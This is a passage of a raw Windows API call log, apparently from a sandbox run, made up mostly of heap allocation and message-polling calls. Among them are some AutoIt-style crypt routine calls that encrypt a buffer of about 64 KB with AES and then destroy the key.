lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb68 [0038.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.882] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0038.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0038.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0038.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0038.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0038.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0038.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0038.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0038.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0038.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0038.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0038.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0038.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0038.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0038.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0038.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0038.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0038.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0038.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0038.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0038.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0038.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0038.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0038.885] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0038.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.885] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da238, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da238*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0038.885] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.885] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.885] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.885] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.885] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.885] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.885] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.885] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.885] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0038.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.886] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.886] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.886] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.886] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.886] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.886] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.886] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.886] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.886] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.886] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.886] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.886] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.886] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.886] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0038.886] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.887] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.887] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xfa32, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xfa40) returned 1 [0038.887] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.887] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.887] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.887] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.887] CharLowerBuffW (in: lpsz="byte[64065]", cchLength=0xb | out: lpsz="byte[64065]") returned 0xb [0038.887] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.888] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.888] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.888] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.888] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.889] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x944a48*, pdwDataLen=0x6ae220*=0xfa32, dwBufLen=0xfa40 | out: pbData=0x944a48*, pdwDataLen=0x6ae220*=0xfa40) returned 1 [0038.889] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.889] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.889] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.889] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.889] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.889] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.889] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0038.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.890] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.890] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.890] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.890] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.890] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.890] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.890] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.890] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.890] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0038.890] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.894] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.894] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.894] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.898] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.898] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.898] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0038.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.898] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.898] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.898] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0038.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.898] CryptDestroyKey (hKey=0x7c2200) returned 1 [0038.898] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.898] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.898] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0038.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.898] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, 